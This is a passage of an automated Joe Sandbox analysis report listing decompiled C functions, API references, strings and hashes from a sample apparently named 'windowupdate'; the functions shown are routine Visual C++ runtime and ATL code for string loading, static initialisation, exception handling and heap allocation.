                      • Opcode Fuzzy Hash: e55f7ef8def0e8a80470682203783a1506b96e833417427687e1a04430de6c1f
                      • Instruction Fuzzy Hash: BA118675A00209AFDF14DF54D852EAE7BB0FF44304F044058FC499B396DB71EA159BA0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00D3FEA0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, unsigned int _a4) {
                      				signed int _v8;
                      				char _v9;
                      				signed int _v12;
                      				signed int _v16;
                      				signed int _v20;
                      				char _v24;
                      				void* _t24;
                      				void* _t25;
                      				void* _t39;
                      				void* _t40;
                      
                      				_v24 = 0xcccccccc;
                      				_v20 = 0xcccccccc;
                      				_v16 = 0xcccccccc;
                      				_v12 = 0xcccccccc;
                      				_v8 = 0xcccccccc;
                      				_v8 = __ecx;
                      				_v9 = 0;
                      				if(_a4 != 0) {
                      					_t43 = _a4 >> 0x10;
                      					if(_a4 >> 0x10 == 0) {
                      						_v16 = _a4 & 0xffff;
                      						_t24 = E00D40D40(_v8, _t43, _v16);
                      						_t44 = _t24;
                      						if(_t24 == 0) {
                      							_t25 = E00D3F1C0(0xf23744);
                      							E00D323E0(__ebx, __edi, __esi, _t44, E00D323B0( &_v24, "C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\cstringt.h", 0xa9b), _t25, 2, "Warning: implicit LoadString(%u) failed\n", _v16);
                      							_t40 = _t40 + 0x14;
                      						}
                      						_v9 = 1;
                      					}
                      				}
                      				return E00DC1520(_v9, _t39 - _t40 + 0x14);
                      			}














                      APIs
                      • _Smanip.LIBCPMTD ref: 00D3FF13
                        • Part of subcall function 00D323E0: @_RTC_CheckStackVars@8.LIBCMTD ref: 00D32473
                      Strings
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\cstringt.h, xrefs: 00D3FF0B
                      • Warning: implicit LoadString(%u) failed, xrefs: 00D3FEF4
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: CheckSmanipStackVars@8
                      • String ID: C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\cstringt.h$Warning: implicit LoadString(%u) failed
                      • API String ID: 1089072215-3286162589
                      • Opcode ID: 7bb60ceb465f6a632a5f589f9c2c5daa05c5e69b71eed135dbd554466fe96472
                      • Instruction ID: ff83d6e03bfcf31621e7cd31874059c13a7198d0c6ef8009dbbefee436f47b6b
                      • Opcode Fuzzy Hash: 7bb60ceb465f6a632a5f589f9c2c5daa05c5e69b71eed135dbd554466fe96472
                      • Instruction Fuzzy Hash: B91130B4D04249AEDB04EFA8D802BADBBB49F04340F0480B9E909A7282E6759A048B71
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 49%
                      			E00D47560(long _a4) {
                      				intOrPtr _v8;
                      				intOrPtr _v12;
                      				void* _t9;
                      				void* _t19;
                      
                      				if( *0xf2027c == 0) {
                      					__eflags = _a4 - 0xffffffff;
                      					if(__eflags == 0) {
                      						_t9 = L00D84930(__eflags, 2, L"d:\\a01\\_work\\38\\s\\src\\vctools\\crt\\vcstartup\\src\\misc\\thread_safe_statics.cpp", 0xa6, 0, "%ls", 0);
                      						__eflags = _t9 - 1;
                      						if(_t9 == 1) {
                      							asm("int3");
                      						}
                      					}
                      					E00D47550(_t9);
                      					_t19 =  *0xf20260; // 0x0
                      					return E00D474F0(WaitForSingleObjectEx(_t19, _a4, 0));
                      				}
                      				_v12 =  *0xf2027c;
                      				_v8 = _v12;
                      				 *0xdc62b0(0xf2025c, 0xf20264, _a4);
                      				return _v8();
                      			}








                      APIs
                      • WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000), ref: 00D475D4
                      Strings
                      • d:\a01\_work\38\s\src\vctools\crt\vcstartup\src\misc\thread_safe_statics.cpp, xrefs: 00D475AD
                      • %ls, xrefs: 00D475A1
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: ObjectSingleWait
                      • String ID: %ls$d:\a01\_work\38\s\src\vctools\crt\vcstartup\src\misc\thread_safe_statics.cpp
                      • API String ID: 24740636-368162206
                      • Opcode ID: 427de46dd2409704ccd41331b7fc0e8d2a4c3b7c665b4e976d806a788e129640
                      • Instruction ID: a039832e6d20d99b953c56e9c71d57855e69db770665e9e6ca657cf076e39c3a
                      • Opcode Fuzzy Hash: 427de46dd2409704ccd41331b7fc0e8d2a4c3b7c665b4e976d806a788e129640
                      • Instruction Fuzzy Hash: A6018F31A44309EFDB24EFA4EC4AF697730AB44701F208259F5495A2D2DB70AA009BA5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00D4B220(intOrPtr* _a4, signed char _a8) {
                      				intOrPtr* _v8;
                      				intOrPtr _v12;
                      				void* _t28;
                      				void* _t36;
                      				void* _t37;
                      
                      				if((_a8 & 0x000000ff) != 0) {
                      					_v8 =  *_a4;
                      					if( *_v8 == 0xe06d7363) {
                      						_t30 = _v8;
                      						if( *((intOrPtr*)(_v8 + 0x10)) == 3) {
                      							if( *((intOrPtr*)(_v8 + 0x14)) == 0x19930520 ||  *((intOrPtr*)(_v8 + 0x14)) == 0x19930521) {
                      								L6:
                      								 *((intOrPtr*)(E00D4C670(_t28, _t30, _t36, _t37) + 0x10)) = _v8;
                      								_v12 =  *((intOrPtr*)(_a4 + 4));
                      								 *((intOrPtr*)(E00D4C670(_t28,  *((intOrPtr*)(_a4 + 4)), _t36, _t37) + 0x14)) = _v12;
                      								E00D89BF0( *((intOrPtr*)(_a4 + 4)));
                      							} else {
                      								_t30 = _v8;
                      								if( *((intOrPtr*)(_v8 + 0x14)) == 0x19930522) {
                      									goto L6;
                      								}
                      							}
                      						}
                      					}
                      				}
                      				return 0;
                      			}









                      APIs
                      • ___vcrt_getptd.LIBVCRUNTIMED ref: 00D4B26E
                      • ___vcrt_getptd.LIBVCRUNTIMED ref: 00D4B282
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: ___vcrt_getptd
                      • String ID: csm
                      • API String ID: 984050374-1018135373
                      • Opcode ID: 5eb352aa750afaac9d54a6ba8ca128d4154bd8edf7bd430b78a96139b86eff4c
                      • Instruction ID: dbefc3115991939022736f11511453654e12a4d13cab8e79001bf98c2124e634
                      • Opcode Fuzzy Hash: 5eb352aa750afaac9d54a6ba8ca128d4154bd8edf7bd430b78a96139b86eff4c
                      • Instruction Fuzzy Hash: 43014834A01208EF8F18DFA4C18086DBBB6FF50311B688499D8485B326D770EF41DBA1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00D32500(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                      				intOrPtr _v8;
                      				char _v12;
                      				char _v16;
                      				void* _t10;
                      				void* _t24;
                      				void* _t25;
                      
                      				_v16 = 0xcccccccc;
                      				_v12 = 0xcccccccc;
                      				_v8 = 0xcccccccc;
                      				_t10 = E00D3F1D0(0xf23740);
                      				E00D323E0(__ebx, __edi, __esi, __eflags, E00D323B0( &_v12, "C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlexcept.h", 0x42), _t10, 0, "AtlThrow: hr = 0x%x\n", _a4);
                      				E00D324E0( &_v16, _a4);
                      				return E00DC1520(E00D4BE10( &_v16, 0xdf4690), _t24 - _t25 + 0x20);
                      			}










                      APIs
                      • _Smanip.LIBCPMTD ref: 00D3253B
                        • Part of subcall function 00D323E0: @_RTC_CheckStackVars@8.LIBCMTD ref: 00D32473
                        • Part of subcall function 00D4BE10: RaiseException.KERNEL32(E06D7363,00000001,00000003,?), ref: 00D4BEAA
                      Strings
                      • AtlThrow: hr = 0x%x, xrefs: 00D3251F
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlexcept.h, xrefs: 00D32533
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: CheckExceptionRaiseSmanipStackVars@8
                      • String ID: AtlThrow: hr = 0x%x$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlexcept.h
                      • API String ID: 1594162562-3884214373
                      • Opcode ID: d3620298c7a84c9df47991e4e523d39f92d2312b46fb8538d3e828a8adb765a4
                      • Instruction ID: cc1ad81b6da92bdad27ed7f6a7f25c63116f1368860655d71f44ebe767e31b46
                      • Opcode Fuzzy Hash: d3620298c7a84c9df47991e4e523d39f92d2312b46fb8538d3e828a8adb765a4
                      • Instruction Fuzzy Hash: 32F054B6E443087FDB00FBA9DC43EFD7738DB50740F408568BA052B282EAB4A65487B5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 68%
                      			E00D46B65(void* __ecx) {
                      				void* __edi;
                      				long _t7;
                      				void* _t13;
                      				intOrPtr* _t19;
                      				void* _t21;
                      
                      				_t13 = __ecx;
                      				_t21 = HeapAlloc(GetProcessHeap(), 8, 8);
                      				if(_t21 != 0) {
                      					_t19 = E00D4676A(_t13, 0xf2020c);
                      					 *_t21 = 0 | _t19 == 0x00000000;
                      					if(_t19 == 0) {
                      						_t7 = E00D469E3(_t19);
                      					} else {
                      						 *0xdc62b0();
                      						_t7 =  *_t19();
                      					}
                      					 *(_t21 + 4) = _t7;
                      					if(_t7 != 0) {
                      						return _t21;
                      					} else {
                      						HeapFree(GetProcessHeap(), _t7, _t21);
                      						goto L1;
                      					}
                      				} else {
                      					L1:
                      					return 0;
                      				}
                      			}









                      APIs
                      • GetProcessHeap.KERNEL32(00000008,00000008,?,00D34CBB), ref: 00D46B6A
                      • HeapAlloc.KERNEL32(00000000,?,00D34CBB), ref: 00D46B71
                      • GetProcessHeap.KERNEL32(00000000,00000000,?,00D34CBB), ref: 00D46BB7
                      • HeapFree.KERNEL32(00000000,?,00D34CBB), ref: 00D46BBE
                        • Part of subcall function 00D469E3: GetProcessHeap.KERNEL32(00000008,0000000D,00000000,?,00D46BAD,?,?,00D34CBB), ref: 00D46A07
                        • Part of subcall function 00D469E3: HeapAlloc.KERNEL32(00000000,?,00D46BAD,?,?,00D34CBB), ref: 00D46A0E
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Heap$Process$Alloc$Free
                      • String ID:
                      • API String ID: 1864747095-0
                      • Opcode ID: 3b63eacf5d220a1f85e46ecbc0ab4ef704cbb8932829e46644916637dbe32133
                      • Instruction ID: c284d56aef8b886e75686849da733faee6ef31f98cb7a54187cfb77b6954701d
                      • Opcode Fuzzy Hash: 3b63eacf5d220a1f85e46ecbc0ab4ef704cbb8932829e46644916637dbe32133
                      • Instruction Fuzzy Hash: F2F05E72644B1397CB252BB8BD0DE5A2A65EF82BA17154129F587D6390DE60C8009B72
                      Uniqueness

                      Uniqueness Score: -1.00%